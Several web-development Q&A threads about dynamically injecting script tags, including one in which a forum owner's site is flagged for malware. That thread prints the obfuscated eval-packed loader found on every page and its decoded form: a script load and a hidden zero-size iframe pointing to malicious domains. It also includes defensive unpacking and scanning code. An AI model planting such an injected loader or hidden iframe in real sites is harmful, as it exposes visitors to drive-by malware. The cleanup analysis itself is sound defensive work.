This should be a simple problem, I just can't seem to stumble upon the right answer:
So I have a site in HTML with many pages that all link to the newest one, so I created a simple JavaScript function in a separate file:
function newest() {
window.location = "http://xxxxxxxxxx.xxx/6.html";
}
With the line:
<script type="text/javascript" src="javascript.js"></script>
In my HTML document.
So I can update the number every time a new page is posted. The problem is that when I post a new one, the code doesn't refresh from the user side until you delete the cookies (if I replace it with 7, it will still redirect to 6).
Sorry if it is a stupid question, but everything I have looked up seems way off topic.
The cache expects your javascript to be immutable so unless you can include the file name external to your javascript then this path is not going to work... How about just creating a 'latest.html' page that is either a file system link to the original or else redirects to the latest version.
A simple client side solution would be to inject the script with different version attributes appended to it.
So HTML page can contain a script like :
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://xxxxxxxxxx.xxx/javascript.js?v=' + Math.random();
document.getElementsByTagName('head')[0].appendChild(script);
Notice the random number?
where javascript.js is the one having your code:
function newest() {
window.location = "http://xxxxxxxxxx.xxx/6.html";
}
You can turn off the caching of the resources (javascript files) on the client machine by adding the instructions in your code for the web browser, not to cache. Refer to this link for how to turn off caching for your webpage.
I have the following situation:
a static site, only html pages
a cookie notice system, with my own cookies, accept and refuse system of cookies setup
Now I need to inject the GA4 script into the head of pages when cookies are accepted, but...
I have already made that, by appending the script to the head and it is visible on browser, on page reload with inspect elements...and it's working perfect.
When users click on accept cookies, the cookies accept is saved on client's side, and the script is APPENDED to page.
But I need the GA4 script to be somehow INJECTED, to be visible on the source page. Like when I preview the source page in browser to have it there. I don't need it to be injected into the html file itself, but only into the browser.
I did my own research about these days, and now it's killing me, as all I could find was the append way, but that is not injecting it into the source page on browser.
Any advice or guidance would be greatly appreciated.
Note (as I have been asking all the time. I don't want to offend anyone, but that's the best way I can explain where I want to do and what):
the source page I'm talking about is when right click on browser and view source page (there is where I need the GA4 code to be inserted)
and the way I got it to work is when right click > inspect > elements tab - (there I have it now working)
Thank you!
First question would be, why do you want it to be in the actual source code? A common way of inserting these scripts is through a tag-management-solution, which basically follows similar logic as appending scripts to the page (i.e. similar to what you meant by the inspect elements route).
To answer your question;
There is an option to get it into the sourcecode, and that is by checking on the server delivering the HTML whether a user has accepted the cookies, if that is the case deliver the HTML file (or adjust the HTML) to contain the GA4 script, if the user didn't accept: deliver the page without the GA4 script.
Since you mention these are static HTML files, I assume there is no server in place where this kind of logic can be inserted. So the best option is to insert the script afterwards.
Another way would be to insert the tag by default, but disable tracking (haven't tested the below part, also, verify yourself whether in your situation this actually blocks tracking when cookies aren't accepted):
window['ga-disable-GA_MEASUREMENT_ID'] = true;
https://developers.google.com/analytics/devguides/collection/gtagjs/user-opt-out
You could try to add this in your HTML before loading the GA4 tag, similar to something like:
<script>
const gaMeasurementId = 'G-12345678'; //replace with your own MeasurementID
let cookiesDeclined = true; //default to declined cookies
document.cookie.split(';').forEach( (cookie) =>{ //loop through all cookies
const cookie_arr = cookie.trim().split('='); //trim the space left after each ';', then get key/value pairs for cookies
let name = cookie_arr[0]; //cookiename
let val = cookie_arr[1]; //cookieval
if(name === 'cookieConsent' && val === 'accepted' ){
cookiesDeclined = false; //set the declined status to false when user has accepted the cookies
}
})
window['ga-disable-'+gaMeasurementId] = cookiesDeclined;
//->insert ga4 tag here
</script>
If I have JS script on several different websites, is it possible to enable or disable script execution for specific sites? If this isn't possible, other suggestions for implementation are welcome.
Here's the application:
I have a script tag with my JS source link that site owners can put on their website to enable interaction with my service. However, I would like to be able to enable/disable the service for specific sites so as not to deploy it until they are ready.
note: The script tag also includes site verification information so it gets put on their site before they are ready to deploy. This saves the step of putting in a site verification tag and then going back and putting in the script.
You would want them to put your .ashx handler on your website, then make that return the javascript.
Follow tutorial for ashx page if you are unsure how to http://www.brainbell.com/tutorials/ASP/Generic_Handlers_(ASHX_Files).html
in the processrequest() function:
Check to see if they have it enabled you can use the querystring to see which website it is https://msdn.microsoft.com/en-us/library/system.web.httprequest.querystring(v=vs.110).aspx in the code below there is ?yourwebsitedomain=customersdomain so you would query for "yourwebsitedomain" and you would get "customersdomain"
If they do then Get the bytes of your file using Encoding.UTF8.GetBytes(File.ReadAllText(filename))
and write the results to the output
context.Response.OutputStream.Write(FileBytes, 0, FileBytes.Length);
context.Response.OutputStream.Flush();
Your Customers Website:
<script>
(function() {
var c = document.createElement('script');
c.type = 'text/javascript'; c.async = true;
c.src = "http://yourdomane/yourhandler.ashx?yourwebsitedomain=customersdomain";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(c,s);
})();
</script>
Hope this helps.
So here is the situation, I'm getting an ad from my custom adserver like so
src = 'http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/';
script = document.createElement 'script'
script.type = 'text/javascript'
script.src = src
$('.banner-container').append script
So the problem is the url is correct in the src variable it is correct when it is inserted into the dom
<script type="text/javascript" src="http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/"></script>
But the second the browser tries to fetch it the url changes to
http://www.adserver.comwww/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/
See, right after the .com it strips the / so that comwww runs together, making it throw an error and of course not display what I want. I have tried URI encoding and other little things I had read or seen on stackoverflow to no avail.
Perhaps the problem is on the ad server site. They likely have a bad rewriterule, or a bad internal redirect. I have run your sample code with a different domain and it works fine.
Try visiting the js url in your browser directly, or using a command line tool like curl. Check that it is redirecting. So it is likely that the adserver.com site is redirecting badly. If they have a support contact, you should file a ticket with that company.
I am sorry that this does not directly solve your problem, but I feel that this response is a proper "answer" for this site.
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
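The decompression step above can also be done without running the script at all. This is an added example, not code from the original answer or from JS Beautifier: a static unpacker for this packer format that substitutes the keyword table as text and never calls eval. The function name unpackPacker is hypothetical, and the sample is the script from the question with the decoder body shortened.

```javascript
// Added example: static unpacker for Dean Edwards "p,a,c,k,e,r" output.
// It substitutes tokens as text and never eval()s the untrusted script.
function unpackPacker(source) {
  // Capture the call arguments: }('payload',radix,count,'w0|w1|...'.split('|')
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(source);
  if (!m) return null; // not packer output
  const payload = m[1].replace(/\\(['\\])/g, '$1'); // undo \' and \\ escapes
  const radix = Number(m[2]);
  const words = m[4].split('|');
  // A radix above 36 uses the packer's base-62 alphabet, which is not handled here.
  if (radix < 2 || radix > 36 || words.length !== Number(m[3])) return null;
  return payload.replace(/\b\w+\b/g, (token) => {
    const index = parseInt(token, radix);
    // Only substitute canonical encodings that map to a non-empty keyword.
    if (Number.isNaN(index) || index.toString(radix) !== token) return token;
    return words[index] || token;
  });
}

// Sample: the injected script from the question, decoder body shortened.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,r){/* decoder omitted */return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))`;

console.log(unpackPacker(PACKED_SAMPLE));
```

The result is a plain string, so it can be read or searched for URLs without the payload ever executing.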
First thing you should do is to change your FTP or SSH login and password.
The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.
Even though you overwrite your files the problem may come back. So I strongly suggest to check
note the last modified date of the files in question.
check your FTP, SSH, Access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
1b. Overwrite your files from Backup
if your apache or any webserver that you are using does not have a pending update.
Check the file permission for your website
Change your FTP password immediately
Advice: change your passwords to something strong. e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845, the two lines were replacing </head> with their script+</head>
Tough one to find and smart too.
I resolved this problem. You must find and delete the Base64 function with the shady string in the site files. It decodes this script from the string.
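The two findings above (lines that replace </head>, and a Base64 string that decodes to the script) can be turned into a search over the site's PHP files. This is an added example, not code from any of the posts; it runs under Node.js, the function name scanPhpForInjection is hypothetical, and the PHP calls it looks for (str_replace, preg_replace, base64_decode) are assumptions about how such lines are written, since the page does not show them. The sample file is constructed.

```javascript
// Added example: flag PHP source lines matching the injection described above.
function scanPhpForInjection(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const reasons = [];
    // 1. A string replacement whose arguments mention the closing head tag.
    if (/\b(str_i?replace|preg_replace)\s*\(.*<\/head>/i.test(text)) {
      reasons.push('rewrites </head>');
    }
    // 2. base64_decode() of a long literal that decodes to script-like markup.
    const literal = /base64_decode\s*\(\s*['"]([A-Za-z0-9+\/=]{24,})['"]/g;
    let m;
    while ((m = literal.exec(text)) !== null) {
      const decoded = Buffer.from(m[1], 'base64').toString('latin1');
      if (/<script|<iframe|eval\s*\(|document\.createElement/i.test(decoded)) {
        reasons.push('base64 literal decodes to script content');
        break;
      }
    }
    if (reasons.length) findings.push({ line: i + 1, reasons });
  });
  return findings;
}

// Constructed sample file; the encoded strings are built here, not taken from the page.
const b64 = (s) => Buffer.from(s).toString('base64');
const SAMPLE_PHP = [
  '<?php',
  'function finish_page($html) {',
  `  $x = base64_decode('${b64('<script src="https://example.invalid/x.js"></script>')}');`,
  "  return str_replace('</head>', $x . '</head>', $html);",
  '}',
  `$tagline = base64_decode('${b64('site title and tagline text')}');`,
].join('\n');

console.log(scanPhpForInjection(SAMPLE_PHP));
```

A hit is a lead for manual review rather than proof, since templates can legitimately rewrite </head>; compare flagged files against a clean copy from backup.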
I would like to grab an element from a remote HTML page. As I am requesting data from a different domain I am using the below code to add the source as a script. Yes, very dodgy.
<script type="text/javascript">
var script = document.createElement('script');
script.setAttribute('type', 'text/javascript');
script.setAttribute('src', 'http://remoteDomain.com/page.html');
document.getElementsByTagName('head')[0].appendChild(script);
</script>
The above code fetches and appends the entire page to my document head. Seems to work okay. However now I would like to able to grab an element by ID, or even regex from this source.
Can this be done?
I am aware that the above code is dirty, so I'd be happy to receive any suggestions to clean it up!
Indeed very dodgy... But there are crossdomain AJAX techniques that you can use. Some help here: http://usejquery.com/posts/9/the-jquery-cross-domain-ajax-guide
The above code fetches and appends the entire page to my document head.
It doesn't really, it just creates a script element of which its src points there.
It looks like you are trying to get around Same Origin Policy.
Can you use a server side proxy?
Browsers go to great lengths to prevent this being done client-side unless the site you're trying to read explicitly opts in.
Otherwise any random web page you visit could read info from your bank account, say.